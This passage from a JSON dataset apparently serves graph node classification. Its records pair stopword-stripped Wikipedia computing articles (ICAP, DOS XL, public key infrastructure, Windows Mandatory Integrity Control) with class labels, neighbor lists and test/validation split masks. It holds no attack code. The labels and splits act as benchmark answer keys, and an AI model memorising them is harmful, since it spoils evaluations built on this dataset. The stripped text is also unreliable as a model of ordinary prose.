    "text": "Internet_Content_Adaptation_Protocol:internet content adaptation protocol internet content adaptation protocol icap lightweight http-like protocol specified rfc 3507 used extend transparent proxy servers thereby freeing resources standardizing way new features implemented icap generally used implement virus scanning content filters transparent http proxy caches content adaptation refers performing particular value added service content manipulation associated client request/response icap concentrates leveraging edge-based devices caching proxies help deliver value-added services core process cache proxy client transactions process web servers icap servers focused specific function example ad insertion virus scanning multi-av scanning opswat content translation language translation content filtering off-loading value-added services web servers icap servers allows web servers scaled according raw http throughput versus handle extra tasks icap proposed late 1999 peter danzig john schuster network appliance gillies took project spring 2000 enhanced protocol three main ways gillies prototyped first icap client server netcache series internet caches mid-2000 known icap 0.9 protocol produced training materials vendors client written c++ core netcache server demonstration icap server written perl employed debian word-replacement filters rewrite web pages skipping html tags translating web pages swedish chef jive real time knowledge learned prototyping experience gillies revised ietf draft standard make rpcs using chunked encoding greatly simplifying icap protocol",
    "neighbors": [
      225,
      10210,
      2213,
      4423,
      6569,
      4490,
      6993,
      4725,
      7578,
      7739,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 10817,
    "label": 2,
    "text": "Package_format:package format package format type archive containing computer programs additional metadata needed package managers archive file format may unchanged package formats bear additional metadata manifest file certain directory layouts packages may contain either source code executable files packages may converted one type another software alien arch linux pacman slackware use tar archives generic naming specific internal structures",
    "neighbors": [
      2560,
      3079,
      10760,
      5644,
      7181,
      5139,
      8213,
      9237,
      6680,
      10780,
      4637,
      3618,
      5670,
      9257,
      3114,
      2095,
      1584,
      9266,
      8248,
      3131,
      3649,
      10817,
      8772,
      3659,
      10317,
      4174,
      3667,
      6227,
      2134,
      3162,
      2658,
      6244,
      10857,
      6763,
      9324,
      6257,
      1138,
      7293,
      11391,
      7812,
      8326,
      10382,
      657,
      2195,
      10900,
      3222,
      9882,
      6301,
      1694,
      4775,
      7847,
      6828,
      10933,
      5819,
      6333,
      190,
      2755,
      4803,
      10436,
      6352,
      722,
      4309,
      3289,
      3802,
      6361,
      3804,
      10464,
      1761,
      741,
      231,
      4841,
      8937,
      8940,
      237,
      4845,
      7920,
      6393,
      7938,
      9988,
      11525,
      2310,
      4360,
      7435,
      7947,
      9487,
      788,
      1813,
      8476,
      5410,
      1833,
      6446,
      815,
      304,
      1842,
      4406,
      823,
      2872,
      5430,
      6968,
      3395,
      11076,
      3911,
      3918,
      10063,
      2389,
      4437,
      4951,
      11095,
      9564,
      3422,
      863,
      2401,
      2914,
      1379,
      9063,
      10091,
      6508,
      7020,
      10096,
      1394,
      1396,
      1406,
      3458,
      7555,
      11654,
      2955,
      4493,
      10127,
      2448,
      11155,
      1940,
      1431,
      9637,
      6566,
      935,
      10149,
      4011,
      9646,
      1456,
      2995,
      6583,
      9660,
      10172,
      10687,
      9671,
      4040,
      457,
      5067,
      463,
      4561,
      8147,
      2010,
      9696,
      11232,
      1506,
      7140,
      2021,
      8676,
      6119,
      5096,
      9190,
      10732,
      1522,
      1524,
      2036,
      5620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10818,
    "label": 2,
    "text": "DOS_XL:dos xl dos xl discontinued disk operating system dos written paul laughton mark rose bill wilkinson mike peters published optimized systems software atari 8-bit family home computers designed compatible atari dos came shipped atari inc. disk drives direct descendant os/a+ dos xl provided additional features atari equipped floppy disk drives included single double density support command-line mode called command processor cp menu mode executable loaded memory batch file support support xl extended memory oss supercartridge banked memory later versions included axlon ramdisk support mosaic ramdisk support bit-3 support bug/65 addition supporting auto-booting codice_1 files dos xl batch features provided auto-booting batch feature naming batch file codice_2 would execute batch commands startup os/a+ unfortunately feature n't compatible programs e.g atariwriter dos xl distributed flippy disk one side single-density version double-density version features add-ons included placed double-density side due lack disk space manual dos xl subset os/a+ oss considered manual addendum os/a+ 150+ pages bound spine loose-leaf form like os/a+ manual dos xl came two versions 2.20 2.30 2.20 users pay 20 upgrade 2.30 last version 2.30p dos xl originally sold 30 price later increased 39 file writing verify turned dos xl due oss experience resulted faster writes virtually risk errors command file verify.com included reenable writes verify atari dos 2.0s default verified file writes disk several disk drive manufacturers shipped dos xl drives trak percom astra indus amdek rana c copy files p protect files version 2.30p newer version 2.30 fix two problems patch dos xl 2.30 make 2.30p plans dos xl 4 scrapped due low demand competition oss reissued os/a+ 4.1 mainly double-sided support dos xl along oss products became part icd catalog atari products january 1988 however dos xl dropped favor icd spartados",
    "neighbors": [
      6289,
      2933,
      1750,
      5359
    ],
    "mask": "Test"
  },
  {
    "node_id": 10819,
    "label": 9,
    "text": "Comparison_of_multi-paradigm_programming_languages:comparison multi-paradigm programming languages programming languages grouped number types paradigms supported concise reference programming paradigms listed article",
    "neighbors": [
      7172,
      9224,
      2062,
      2069,
      1051,
      3613,
      9245,
      5165,
      5677,
      5680,
      9780,
      1591,
      6718,
      8771,
      8262,
      603,
      5729,
      2666,
      2670,
      9330,
      9331,
      2680,
      3705,
      7292,
      9345,
      2691,
      9875,
      9877,
      8854,
      7326,
      4770,
      4777,
      7851,
      7341,
      692,
      191,
      5830,
      9926,
      5833,
      7889,
      5845,
      7395,
      228,
      4838,
      7421,
      256,
      5395,
      11555,
      3876,
      4410,
      10042,
      4417,
      10568,
      11610,
      8554,
      10097,
      3442,
      3960,
      10618,
      1917,
      3462,
      8582,
      6536,
      9626,
      1435,
      5031,
      428,
      8644,
      2505,
      4042,
      11219,
      10198,
      2519,
      2009,
      5081,
      477,
      3051,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 10820,
    "label": 7,
    "text": "CloudBook:cloudbook cloudbook discontinued x86 subnotebook ultra-mobile pc developed everex using via processor chipset nanobook reference design competed asus eee pc olpc xo-1 classmate pc device categorized netbook around 2008 term cloudbook resurrected refer small-storage laptops depend networked storage services cloud come packaged device google chrome os cloudbooks chromebooks installed google drive windows os cloudbooks bundled microsoft onedrive sales gpc tc2502 everex desktop left company inquiries customers seeking similar additional open source mobile platforms everex decided build two systems classic laptop also running gos v2 called gbook system based via nanobook reference design also used packard bell easynote xs release originally planned january 25 2008 everex pushed release back citing problems version gos wanted use delay needed everex wanted rewrite gos v2 cloudbook would use gnome window manager instead enlightenment 17 making even compatible ubuntu e17 dock replaced avant window navigator approach looks functionality older gos versions cloudbook expected released united states february 15 2008 wal-mart zareason pushed back february 21 wal-mart zareason received part shipment price device set us 399 came one year limited warranty 24/7 toll free technical support nivio also created cloudbook based nokia/intel meego platform owned us trademark cloudbook cloudpc aiming use linux platform delivering full windows experience desktop service appstore renting software launched airtel india nivio co-founded sachin dev duggal saurabh p dhoot everex cloudbook uniquely located built-in pointing device stamp-sized touchpad upper right side computer instead bottom keyboard common notebook computers cloudbook intended held one hand typing two hands using mouse-cursor control left thumb controlling two mouse buttons right thumb small trackpad mousepad keys placed directly screen design chosen system could even used standing walking around instead sitting cloudbook sold ultra-mobile pc umpc feature even though touch-screen cloudbook came completely new version compared version used gpc gos linux distribution based ubuntu application software mozilla skype facebook faqly openoffice.org google originally gos came enlightenment 0.17 window manager though pre-installed operating system gos everex released windows xp hardware drivers making simple install microsoft windows xp however everex warns software outside original gos covered warranty though hardware warranty unaffected next generation cloudbook advertised processor running 1.6 ghz 80gb disk drive touch pad wimax however company ceased operations",
    "neighbors": [
      1537,
      3585,
      7938,
      2308,
      4236,
      10893,
      911,
      1935,
      4623,
      1682,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      5019,
      10393,
      6178,
      6307,
      9766,
      5159,
      3883,
      6444,
      10109,
      7983,
      8495,
      3121,
      5681,
      9266,
      7352,
      1849,
      1728,
      2496,
      4289,
      7492,
      1224,
      8520,
      11337,
      4429,
      7248,
      1362,
      467,
      9682,
      6618,
      5339,
      6367,
      2784,
      4194,
      11646,
      3300,
      5732,
      10090,
      3819,
      7660,
      2285,
      9581,
      10606,
      1776,
      4977,
      9970,
      499,
      2420,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 10821,
    "label": 4,
    "text": "Department_of_Defense_Information_Assurance_Certification_and_Accreditation_Process:department defense information assurance certification accreditation process dod information assurance certification accreditation process diacap united states department defense dod process means ensure companies organizations apply risk management information systems diacap defines dod-wide formal standard set activities general tasks management structure process certification accreditation c dod maintains information assurance ia posture throughout system life cycle note march 12 2014 though official transition take place may 2015 diacap replaced risk management framework rmf dod information technology although re-accreditations continue late 2016 systems yet started accreditation may 2015 transition rmf processes dod rmf aligns national institute standards technology nist risk management framework rmf diacap resulted nsa directed shift underlying security approaches interim version diacap signed july 6 2006 superseded interim ditscap guidance final version called department defense instruction 8510.01 signed march 12 2014 previous version november 28 2007 dodi 8500.01 cybersecurity http //www.dtic.mil/whs/directives/corres/pdf/850001_2014.pdf dodi 8510.01 risk management framework rmf dod information technology http //www.dtic.mil/whs/directives/corres/pdf/851001_2014.pdf diacap differs ditscap several ways—in particular embrace idea information assurance controls defined dodd 8500.1 dodi 8500.2 primary set security requirements automated information systems aiss ia controls determined based system mission assurance category mac confidentiality level cl",
    "neighbors": [
      7979,
      10831,
      1875,
      5780,
      6360
    ],
    "mask": "Test"
  },
  {
    "node_id": 10822,
    "label": 2,
    "text": "Federico_Heinz:federico heinz federico heinz argentinian programmer free software advocate living london co-founder current president fundación vía libre non-profit organization promotes free flow knowledge motor social progress use development free software helped legislators argentina ing dragan dr. conde peru dr. villanueva draft defend legislation demanding use free software areas public administration works google uk office speaks fluent spanish english german",
    "neighbors": [
      1026,
      2050,
      1028,
      5644,
      2581,
      3618,
      6691,
      2109,
      8258,
      5703,
      8263,
      589,
      4177,
      8787,
      1112,
      3674,
      8304,
      7793,
      3189,
      5759,
      2180,
      4230,
      9865,
      8848,
      657,
      6808,
      6302,
      3744,
      8354,
      4265,
      8364,
      1717,
      2233,
      5833,
      6352,
      3802,
      4831,
      7904,
      10464,
      3817,
      8436,
      4367,
      7450,
      2332,
      10012,
      802,
      5410,
      6947,
      5931,
      6962,
      823,
      11069,
      843,
      11602,
      4437,
      6489,
      9579,
      1394,
      1396,
      11643,
      11654,
      4493,
      10642,
      1939,
      3478,
      7584,
      11180,
      5555,
      9148,
      10687,
      4561,
      8147,
      2010,
      9696,
      8673,
      11232,
      1007,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 10823,
    "label": 4,
    "text": "Cyber_Essentials:cyber essentials cyber essentials uk government information assurance scheme operated national cyber security centre ncsc encourages organisations adopt good practice information security includes assurance framework simple set security controls protect information threats coming internet developed collaboration industry partners including information security forum isf information assurance small medium enterprises consortium iasme british standards institution bsi endorsed uk government launched 2014 department business innovation skills organisations earn two levels certification badges annual recertification recommended certifying bodies turn licensed accreditation bodies appointed uk government five current accreditation bodies apmg crest iasme irm security qg council registered ethical security testers crest developed assessment framework iasme incorporated cyber essentials wider iasme information assurance standard iso/iec 27001 organisations may choose limit scope certification certain subset business five main technical controls cyber essentials guidance breaks finer details controls mapped controls required iso/iec 27001 standard good practice iasme governance although cyber essentials narrower focus emphasising technical controls rather governance risk policy cyber essentials scheme launched 5 june 2014 several organisations quickly certified end june since october 2014 cyber essentials certification required suppliers central uk government handle certain kinds sensitive personal information intended encourage adoption businesses wishing bid government contracts insurers suggested certified bodies may attract lower insurance premiums 6,000 cyber essentials certificates awarded businesses organisations wannacry ransomware attack nhs digital refused finance £1 billion estimated cost meeting cyber essentials plus standard saying would constitute value money invested £60 million planned plan spend £150 million address key cyber security weaknesses next two years",
    "neighbors": [
      11172,
      4678,
      8998,
      4904,
      6648,
      399,
      433,
      2737,
      6360,
      7515,
      9375
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10824,
    "label": 9,
    "text": "MIVA_Script:miva script miva script proprietary computer scripting language mainly used internet applications e-commerce 2015 developed maintained owned miva merchant inc. based san diego california many web hosting companies support miva script servers significantly less widespread popular web languages language first developed name htmlscript joe austin others 1995 company htmlscript corporation formed following year origins miva script began 1993 david haldy joseph austin built first version htmlscript first version written programming language perl called logic enhanced html lehtml joseph austin wrote wrapper programming language c let start root process downgrade immediately ownership permissions owner script file wrapper made suitable use hosting service called volant turnpike time joseph austin eventually sold volant turnpike dave haldy perl allowed self-executing code lehtml expression analyzer parsed expression perl syntax passed perl volant turnpike users liked using lehtml joseph austin ron ahern wrote expression analyzer re-implemented lehtml syntax c language joseph austin called end result htmlscript registered name united states patent trademark office uspto joseph austin troy mccasland derek finley founders company called htmlscript corporation htmlscript concept loop low server processing power time would enough bring whole server even one program ran away joseph austin implement loop make impossible htmlscript server process run away also implemented macro first version htmlscript would allow self-executing code macro powerful eventually security issues 1997 jon burchmore extensively rewrote language make syntactically consistent although new engine supported old htmlscript new named mivascript syntaxes jon burchmore rewrote htmlscript syntax joe developed help softquad using emerging xml standard jon burchmore wrote replacement koolkat became miva merchant new end-product supported old htmlscript syntax new named miva script syntaxes october 14 1997 htmlscript ’ name changed miva script company name changed miva soon afterward miva merchant followed suit name product name miva comes egyptian hieroglyphics word cat word cat combination two symbols milk basin followed quail milk basin pronounced mee quail pronounced waa combined say cat joseph austin thought clever called koolkat “ electronic cat alog. ” joseph showed german friend could pronounce waa sound instead kept pronouncing va joseph austin registered domain miva.com filed trademark 1998 firm renamed miva corporation 1998 first version miva merchant came 2002 miva script compiler delivered htmlscript syntax macros dropped engine miva corporation sold 2003 mid-cap public company called findwhat subsequently findwhat bought name miva 2007 russell carroll group investors bought original miva technologies customer base miva started miva merchant inc. miva script often described 'xml-like although something misnomer consists tags may interspersed html xhtml start mv paired stand-alone empty tags version 4.14 miva script interpreted miva script engine empresa version 4.00 introduced compiler boosting performance significantly one distinguishing features miva script native support variation dbase database platform dbf iii tables proprietary index format support sql many installations today running mysql database variables untyped pre-declared miva script uses file extensions .mv .mvc .mvt common file extension runtime compiled template source files empresa underlying engine miva script versions numbered less 4.0 miva merchant empresa script interpreter available web servers running *nix microsoft windows operating systems recent interpreter version 3.9705 interpreted miva script still widely supported many web hosts versions numbered 3.9x transitional form language implementing new features found version 4 arrays since 4.0 miva merchant empresa virtual machine running compiled miva script available versions *nix microsoft windows current version level 5.x added new language constructs native sql support new access-methodology dbase3 tables called miva-sql new templating syntax empresa virtual machine compile fly version 5.08 later support gd graphics library miva merchant mia version empresa engine designed run windows pc localhost server watching specified port usually 8000 8080 server software needed unless post office protocol pop smtp functions used provides portable stand-alone development environment miva merchant mia updated miva merchant empresa release like empressa versions pre-4 interpreters post-4.0 work compiled script minor differences miva merchant script compiler introduced mid-2002 claiming offer better performance closure application source code compilability required changes language support old htmlscript syntax macros evaluated runtime often considered security risk dropped compiler produces platform-independent bytecode runs miva merchant empresa miva merchant mia virtual machines minor variations exist empresa mia virtual machines may 2005 miva corporation made script compiler available free 2011 built licensing code removed simplifying installation august 2007 miva merchant separated parent company due management buy-out ref press release miva script 5.0 introduced page template compiler command basis miva merchant storemorph trade page template system compiler within compiler offers simplified subset full language suitable end user creation editing web page templates storemorph trade pages allow modular components created mivascript added template extending capabilities february 2011 introduced new mivascript.com website fully documenting latest version language including gd graphics library",
    "neighbors": [
      1952,
      9345,
      4614,
      8582,
      11625,
      5612,
      5677,
      6797,
      7022,
      7983,
      9780,
      9909,
      2045,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10825,
    "label": 4,
    "text": "LAIM_Working_Group:laim working group laim log anonymization information management working group nsf onr funded research group national center supercomputing applications direction adam slagell work group focuses upon log anonymization internet privacy laim group established 2005 released 3 different log anonymization tools canine scrub-pa flaim flaim tool still active development",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10826,
    "label": 4,
    "text": "Daniel_Balsam:daniel balsam daniel balsam american lawyer best known lawsuits e-mail spammers violations internet spam laws balsam filing lawsuits spammers since 2002 earned 1 million court judgments filing lawsuits balsam aims publicize names principals profiting spam advertising aims make spamming less profitable cause companies reconsider decision market products spam balsam describes practice cleaning internet although critics accuse taking advantage legal system balsam decided begin suing spammers became enraged volume breast enlargement spam received working marketing began filing lawsuits small claims court 2002 initially seeing lawsuits hobby balsam soon decided make vocation attended university california hastings college law graduated 2008 time graduated law school balsam filed several dozen lawsuits files lawsuits based spam receives e-mail addresses makes enough money court judgments support full-time help attorney timothy walton judgments 1,000 per e-mail spam messages identify company sending message often difficult identify source balsam frequently faced fictitious business names registered post office boxes balsam awarded 1.125 million verdict pornography company sent 1,125 e-mails able collect judgment however domain registrar tucows refused identify owner company sent spam balsam lawsuits brought california anti-spam laws although many cases tried small claims court filed first spam lawsuit brought trial california superior court— balsam v. trancos inc. —which currently appeal among companies balsam sued small claims court various inc. dba adult friendfinder tagged.com deniro marketing llc dba amateurmatch stockton asparagus festival balsam critical can-spam act arguing tough enough spammers also believes u.s. government enough enforce laws spam still law school balsam helped draft bill ab 2950 sponsored california state assemblyman jared huffman would toughened california anti-spam laws bill aimed close proponents characterized loopholes tighten ambiguous language business professions code 17529.5 clearly set forth practices unlawful make easier bring lawsuits deceptive spammers spamvertisers although bill passed state assembly governor arnold schwarzenegger vetoed bennet kelley internet lawyer balsam faced court vocally critical balsam tactics balsam also sued valueclick inc. twice bloosky interactive llc allegedly violating settlement confidentiality and/or non-disparagement agreements shortly entering settlement balsam maintains suits retaliatory",
    "neighbors": [
      4272,
      6762,
      10263
    ],
    "mask": "None"
  },
  {
    "node_id": 10827,
    "label": 7,
    "text": "Bracket_Computing:bracket computing bracket computing cloud computing company founded 2011 tom gillis jason lango previously ironport systems based mountain view california 2015 company raised 45 million investment round led fidelity goldman sachs bringing funding total 130 million primary software offering called computing cell october 2015 company employed 70 people planned hire software engineers 1 may 2018 vmware announced tom gillis lead vmware network security business unit vmware intends acquire bracket computing intellectual property members bracket staff bracket computing website redirects 403 forbidden page",
    "neighbors": [
      6153,
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 10828,
    "label": 2,
    "text": "Mandatory_Integrity_Control:mandatory integrity control context microsoft windows family operating systems mandatory integrity control mic core security feature introduced windows vista implemented subsequent desktop line windows operating systems adds integrity levels il -based isolation running processes il represents level trustworthiness object mechanism goal use pre-existing integrity control policies involved objects il selectively restrict access permissions contexts considered potentially less trustworthy compared contexts running user account trusted mandatory integrity control defined using new access control entry ace type represent object il security descriptor windows access control lists acls used grant access rights read write execute permissions privileges users groups il assigned subject access token initialized subject tries access object example file security reference monitor compares integrity level subject access token integrity level object security descriptor windows restricts allowed access rights depending whether subject il higher lower object depending integrity policy flags new access control entry ace security subsystem implements integrity level mandatory label distinguish discretionary access user control acls provide windows vista defines four integrity levels low sid s-1-16-4096 medium sid s-1-16-8192 high sid s-1-16-12288 system sid s-1-16-16384 default processes started regular user gain medium il elevated processes high il introducing integrity levels mic allows classes applications isolated enabling scenarios like sandboxing potentially-vulnerable applications internet-facing applications processes low il called low-integrity processes less access processes higher ils access control enforcement windows objects access control lists named objects including files registry keys even processes threads entry system access control list governing access defines minimum integrity level process use object windows makes sure process write delete object integrity level equal higher requested integrity level specified object additionally privacy reasons process objects higher il out-of-bounds even read access processes lower il consequently process interact another process higher il process perform functions inject dll higher il process using codice_1 api function send data different process using codice_2 function processes inherit integrity level process spawned integrity level customized time process creation well defining boundary window messages user interface privilege isolation uipi technology mandatory integrity control used applications like adobe reader google chrome internet explorer windows explorer isolate documents vulnerable objects system internet explorer 7 introduces mic-based protected mode setting control whether web page opened low-integrity process provided operating system supports mic based security zone settings thereby preventing classes security vulnerabilities since internet explorer case runs low il process modify system level objects—file registry operations instead virtualized adobe reader 10 google chrome two notable applications introducing technology order reduce vulnerability malware microsoft office 2010 introduced protected view isolated sandbox environment excel powerpoint word prohibits potentially unsafe documents modifying components files resources system protected view operates low-integrity process windows vista later versions windows uses mic uipi restrict sandbox however cases higher il process need execute certain functions lower il process lower il process need access resources higher il process access example viewing webpage protected mode save file downloaded internet folder specified user high il low il processes still communicate using files named pipes lpc shared objects shared object must integrity level low low il process shared low il high il processes since mic prevent low il process sharing objects higher il process trigger flaws higher il process work behalf low il process thereby causing squatting attack shatter attacks however prevented using user interface privilege isolation takes advantage mic",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      7713,
      9762,
      8227,
      8740,
      1577,
      5673,
      10281,
      2101,
      3643,
      10812,
      3648,
      10310,
      1098,
      7754,
      4173,
      4174,
      9808,
      4178,
      10839,
      1113,
      603,
      9819,
      3170,
      11364,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      3723,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      5799,
      2221,
      5293,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      1247,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      2309,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7473,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      4423,
      3922,
      4439,
      5465,
      3935,
      9569,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      1417,
      1418,
      2443,
      5003,
      5004,
      6028,
      2959,
      8080,
      3482,
      11677,
      929,
      11683,
      4010,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      5057,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5082,
      5594,
      478,
      9695,
      6114,
      6115,
      2027,
      6637,
      9709,
      11248,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10829,
    "label": 8,
    "text": "Devices_Profile_for_Web_Services:devices profile web services devices profile web services dpws defines minimal set implementation constraints enable secure web service messaging discovery description eventing resource-constrained devices objectives similar universal plug play upnp addition dpws fully aligned web services technology includes numerous extension points allowing seamless integration device-provided services enterprise-wide application scenarios dpws specification initially published may 2004 submitted standardization oasis july 2008 dpws 1.1 approved oasis standard together ws-discovery 1.1 soap-over-udp 1.1 june 30 2009 dpws defines architecture devices run two types services hosting services hosted services hosting services directly associated device play important part device discovery process hosted services mostly functional depend hosting device discovery addition hosted services dpws specifies set built-in services dpws builds following core web services standards wsdl 1.1 xml schema soap 1.2 ws-addressing comprises ws-metadataexchange ws-transfer ws-policy ws-security ws-discovery ws-eventing microsoft windows vista windows embedded ce6r2 platforms natively integrate dpws stack called wsdapi included part windows rally technologies support osgi way dpws supports dynamic discovery part evolving vision distributed applications leverage ws-* standards application automation environments clear 2007 consumer electronics show “ next gen ” home highlighted automation system life|ware exceptional innovation uses dpws communicate lighting system audio distribution system security system motorized shades security cameras thermostats washers dryers motorized television mount show demonstrated tremendous consumer interest prospect bringing controllable devices environment digital entertainment manufacturers taking notice many manufacturers first step towards dpws adoption creation small “ device bridge ” native usually proprietary code web services least 117 automation av products 37 different vendors currently support dpws either natively bridge international security controls isc trade show major security company demonstrated security system supported dpws kitchen bath show kbis saw two major appliance manufacturers demonstrating washers dryers communicated using dpws communicative oven demonstrated international building show past two years even greater sign drive towards market acceptance dpws introduced-in-2006 connectedlife.home home automation package offered us retailer best buy package uses automation software controllable devices leverage dpws communications within sirena project auspices european research initiative itea schneider electric produced early dpws implementation targeted embedded devices implementation open-sourced soa4d.org soa devices website dpws stack c java versions add-ons like ws-management ws-security implementations freely downloaded also stemming sirena project web services devices ws4d.org website provides information downloads news three dpws implementations one c implementation integrating gsoap one java implementation using axis another java implementation use different java editions including java following sirena project new european research project itea named soda service oriented device delivery architecture went development implementation embedded dpws stack devices associated tools eu research project socrades composed heavyweights like abb sap schneider electric siemens focusing implementing testing piloting prototypes dpws-enabled devices industrial automation domain extending work eu aesop project several proposals and/or projects worked integration dpws osgi i.e mainly providing implementation java framework",
    "neighbors": [
      8070,
      8203,
      6284,
      7320,
      6811,
      10396,
      7198,
      10020,
      425,
      5677,
      2501,
      7878,
      8391,
      1098,
      6357,
      2013,
      4979,
      10229,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 10830,
    "label": 5,
    "text": "XSwitch:xswitch xswitch interconnect used xcore processor interconnect protocol defined xmos based around routing messages comprising 9-bit tokens cores network protocol specifically designed on-chip board-level communication using lvds drivers also run longer cables interconnect routes sequences messages message consists header specifies core address sequence tokens end-token 512 tokens 256 data tokens 256 control tokens data tokens used transport data e.g audio data stream control tokens used send in-band control data order implement protocols interconnect message routed sequence switches interconnected xlinks two control tokens used end message end ends message pause suspends message tokens free route switches difference end pause end token delivered receiver whereas pause token silently thrown away last switch since messages terminated token rather packet length sender may choose terminate message creates open circuit guaranteed bandwidth latency applications use example one series links form circuit stream audio use another series links small packets containing control data circuits guarantee order delivery tokens transmitted messages may delivered order multiple paths circuits permanently occupy series links whereas messages occupy links short periods time xswitch interconnect architecture implements media layer osi model physical layer signal either transmitted using serial protocol two wires using fast protocol five wires cases signal transmitted series transitions using 1 code two-wire system transition wire 0 signals 0 bit transition wire 1 signals 1 bit token transmitted sequence exactly 10 transitions first eight signal eight data bits msb first one bit signal whether control token finally return-to-zero bit returns wires zero nine transitions one wire high five-wire system four data wires 0 1 2 3 transition 0 signals '00 transition 1 signals '01 etc sequence four transitions transmits eight data bits fifth wire escape wire used transmit control tokens unlike two-wire system even number wires high token wires return zero end message modes degree asynchronous clock transitions signal data order transitions signal order bits transmitter must transmit data faster receiver interpret data must make sure sufficient gaps edges overtake pads data transmission suspended time link layer protocol relies use credits order signal whether data transmitted receivers always issue credits transmitter transmitter allowed send data link give 8 32 64 credits never issue 127 credits guarantees side always record credits using 7 bit counters conversely large numbers credits given link needs large receive buffers minimum size receive buffer 8 tokens 72 bits network layer routes messages interconnect nodes network identified means 16-bit address messages routed successively matching bits destination address every node message brought closer destination taking first non matching bit looking set links used destination message routed link route rolled end pause control token found given header precedes packet implements wormhole routing routing set deadlock free free starvation interconnects arbitrate incoming messages without locking link switches xcore xs1-g4 xcore xs1-l1 xcore-200 processors implementations xswitch implementations differ terms number internal external links supported xs1-g4 switch 32 links 16 links external links operate speed 400 mbits per second 16 links connected four cores four links per core internal links operate 3.2 gbits per second maximum throughput implementation xswitch 57.6 gbits per second 6.4 gbit per second external links 51.2 gbits per second internal links xs1-l1 switch 12 links eight links external links operate speed 400 mbits per second four links connected internally core internal links operate 3.2 gbits per second maximum throughput implementation xswitch 16 gbits per second 3.2 gbit per second external links 12.8 gbits per second internal links xcore200 switch 17 links eight input links links external links operate speed 400 mbits per second eight links internal connected cores four core internal links operate 4 gbits per second final link connected on-chip usb phy maximum throughput implementation xswitch 35.25 gbits per second 3.2 gbit per second external links 32 gbits per second internal links plus 0.05 gbit/s final internal link",
    "neighbors": [
      7865,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 10831,
    "label": 4,
    "text": "Public_key_infrastructure:public key infrastructure public key infrastructure pki set roles policies hardware software procedures needed create manage distribute use store revoke digital certificates manage public-key encryption purpose pki facilitate secure electronic transfer information range network activities e-commerce internet banking confidential email required activities simple passwords inadequate authentication method rigorous proof required confirm identity parties involved communication validate information transferred cryptography pki arrangement binds public keys respective identities entities like people organizations binding established process registration issuance certificates certificate authority ca depending assurance level binding may carried automated process human supervision pki role assures valid correct registration called registration authority ra ra responsible accepting requests digital certificates authenticating entity making request microsoft pki registration authority usually called subordinate ca entity must uniquely identifiable within ca domain basis information entity third-party validation authority va provide entity information behalf ca x.509 standard defines commonly used format public key certificates public key cryptography cryptographic technique enables entities securely communicate insecure public network reliably verify identity entity via digital signatures public key infrastructure pki system creation storage distribution digital certificates used verify particular public key belongs certain entity pki creates digital certificates map public keys entities securely stores certificates central repository revokes needed pki consists broadly speaking traditionally three approaches getting trust certificate authorities cas web trust wot simple public key infrastructure spki primary role ca digitally sign publish public key bound given user done using ca private key trust user key relies one trust validity ca key ca third party separate user system called registration authority ra may may separate ca key-to-user binding established depending level assurance binding software human supervision term trusted third party ttp may also used certificate authority ca moreover pki often used synonym ca implementation model trust relationships ca trusted third party – trusted subject owner certificate party relying upon certificate according netcraft industry standard monitoring active transport layer security tls certificates states that- although global tls ecosystem competitive dominated handful major cas — three certificate authorities symantec comodo godaddy account three-quarters issued tls certificates public-facing web servers top spot held symantec verisign purchased symantec ever since survey began currently accounting third certificates illustrate effect differing methodologies amongst million busiest sites symantec issued 44 valid trusted certificates use — significantly overall market share approach involves server acts offline certificate authority within single sign-on system single sign-on server issue digital certificates client system never stores users execute programs etc temporary certificate common find solution variety x.509-based certificates alternative approach problem public authentication public key information web-of-trust scheme uses self-signed certificates third party attestations certificates singular term web trust imply existence single web trust common point trust rather one number potentially disjoint webs trust examples implementations approach pgp pretty good privacy gnupg implementation openpgp standardized specification pgp pgp implementations allow use e-mail digital signatures self-publication public key information relatively easy implement one web trust one benefits web trust pgp inter-operate pki ca fully trusted parties domain internal ca company willing guarantee certificates trusted introducer web trust completely trusted nature web trust trusting one certificate granting trust certificates web pki valuable standards practices control issuance certificates including pgp personally instituted web trust could significantly degrade trustworthiness enterprise domain implementation pki web trust concept first put forth pgp creator phil zimmermann 1992 manual pgp version 2.0 another alternative deal public authentication public key information simple public key infrastructure spki grew three independent efforts overcome complexities x.509 pgp web trust spki associate users persons since key trusted rather person spki use notion trust verifier also issuer called authorization loop spki terminology authorization integral design emerging approach pki use blockchain technology commonly associated modern cryptocurrency since blockchain technology aims provide distributed unalterable ledger information qualities considered highly suitable storage management public keys cryptocurrencies support storage different public key types ssh gpg rfc 2230 etc provides open source software directly supports pki openssh servers blockchain technology approximate proof work often underpinning confidence trust relying parties pki issues remain administrative conformance policy operational security software implementation quality certificate authority paradigm issues regardless underlying cryptographic methods algorithms employed pki seeks endow certificates trustworthy properties must also address issues list known blockchain-based pki developments pki occurred early 1970s british intelligence agency gchq james ellis clifford cocks others made important discoveries related encryption algorithms key distribution however developments gchq highly classified results work kept secret publicly acknowledged mid-1990s public disclosure secure key exchange asymmetric key algorithms 1976 